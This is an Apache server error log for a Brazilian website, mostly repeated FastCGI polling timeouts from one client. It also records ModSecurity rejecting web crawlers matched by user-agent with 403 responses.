[Sun Mar 15 16:27:45.053856 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:28:07.131885 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46482] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:28:35.126490 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46748] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:28:57.053867 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:29:18.121885 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47368] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:29:39.125825 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:29:42.849521 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.244.31:56520] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcIppqj1wV0Si-OkeeDXQAAAAU"]
[Sun Mar 15 16:30:00.125792 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:30:11.923227 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.228.16:53838] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcIw3jZBu2q05ozVU_0kwAAAVU"]
[Sun Mar 15 16:30:24.125821 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:30:47.165494 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48264] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:31:11.121811 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:48488] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:31:33.111608 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48784] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:31:54.125819 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:32:15.137817 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49264] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:32:36.129816 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49468] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:33:06.126149 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49824] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:33:27.141793 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50128] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:33:57.122331 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:34:18.137814 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50582] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:34:40.129963 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:35:01.113936 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50970] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:35:05.589020 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.244.31:59758] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcJ6XbQATo66fKoS7zp2gAAANA"]
[Sun Mar 15 16:35:22.093897 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:35:37.711510 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.228.16:46342] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcKCXbQATo66fKoS7zp7QAAANM"]
[Sun Mar 15 16:35:45.129952 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51362] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:36:09.072908 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:36:30.129895 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51778] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:36:56.129911 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52136] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:37:17.132936 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:37:38.133771 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:37:59.144176 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:38:20.299918 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:38:43.123918 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:39:19.059909 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53500] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:39:40.118136 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:40:02.137864 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:40:23.137779 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:40:44.125827 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:41:08.137834 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:41:16.526483 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.244.31:58912] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcLXNSswJuvopo3lOgHZAAAAIY"]
[Sun Mar 15 16:41:30.130194 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55018] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:41:45.453095 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.228.16:33704] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcLedSswJuvopo3lOgHbgAAAJM"]
[Sun Mar 15 16:41:52.093823 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55218] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:42:19.157843 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55524] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:42:40.133817 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:43:01.121780 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56072] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:43:22.133786 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56374] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:43:44.115308 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:44:06.133803 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56928] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:44:42.069883 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:45:03.133789 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57418] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:45:24.125876 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57544] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:45:45.101304 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:46:06.123315 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:46:29.044072 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.244.31:35730] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcMlbABkC4fWIHEf8GNqwAAAFE"]
[Sun Mar 15 16:46:29.130462 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58128] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:46:51.133612 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58338] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:46:55.301242 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.228.16:53274] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcMr7ABkC4fWIHEf8GNvwAAAEo"]
[Sun Mar 15 16:47:14.045908 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58556] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:47:41.125783 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:48:03.125394 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58928] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:48:25.126570 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59182] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:48:46.793789 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:49:09.133772 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59614] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:49:30.033925 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:49:51.125815 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:50:25.125915 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:50:46.053846 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:51:07.125953 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60702] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:51:33.137810 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:51:43.852254 2026] [:error] [pid 21533:tid 140411666392832] [client 15.235.27.135:59634] [client 15.235.27.135] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcNznjZBu2q05ozVU_25wAAAUk"]
[Sun Mar 15 16:51:48.289279 2026] [:error] [pid 11972:tid 140411540502272] [client 51.161.37.83:59746] [client 51.161.37.83] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abcN1Jqj1wV0Si-OkeeGVwAAABg"]
[Sun Mar 15 16:51:54.121853 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:32956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:52:21.121886 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33240] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:52:25.655021 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.228.16:39562] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcN-XbQATo66fKoS7zsJwAAAMM"]
[Sun Mar 15 16:52:43.057791 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33462] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:53:05.017828 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33758] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:53:26.125943 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33968] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:53:47.122693 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34196] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:54:08.133789 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:54:29.045840 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34702] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:54:50.121781 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34964] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:55:11.133778 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:55:32.057842 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:55:53.131295 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35682] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:56:14.141008 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:56:35.125834 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36130] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:56:56.125782 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:56:57.290807 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.244.31:46816] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcPCdSswJuvopo3lOgJBAAAAJQ"]
[Sun Mar 15 16:57:17.125793 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36668] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:57:38.130905 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:58:00.097820 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37108] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:58:21.123982 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:58:34.806333 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.228.16:38122] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcPatSswJuvopo3lOgJRgAAAI0"]
[Sun Mar 15 16:58:43.131350 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:59:04.129825 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37708] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:59:25.121240 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37886] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:59:47.137812 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38136] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:00:08.029140 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38448] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:00:29.125799 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:00:50.142016 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39012] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:01:11.125895 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:01:32.121814 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39496] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:01:55.101864 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:02:15.946340 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.244.31:52786] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcQR5qj1wV0Si-OkeeIAQAAABE"]
[Sun Mar 15 17:02:16.125774 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:02:37.121852 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40182] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:02:59.125825 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:03:21.061238 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40668] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:03:42.129777 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:03:53.489698 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.228.16:54248] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcQqXbQATo66fKoS7ztiwAAAMQ"]
[Sun Mar 15 17:04:04.125827 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41200] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:04:26.121880 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:04:48.125800 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:05:09.131390 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42054] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:05:30.025802 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42312] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:05:51.119673 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42516] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:06:12.125882 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:06:33.121812 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43010] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:06:54.124156 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43330] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:07:15.136437 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:07:22.813184 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.244.31:43618] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcRenjZBu2q05ozVU_4wQAAAU0"]
[Sun Mar 15 17:07:36.057940 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:07:57.125953 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44128] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:08:18.121799 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:08:40.121796 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44648] AH01075: Error dispatching request to : (polling)
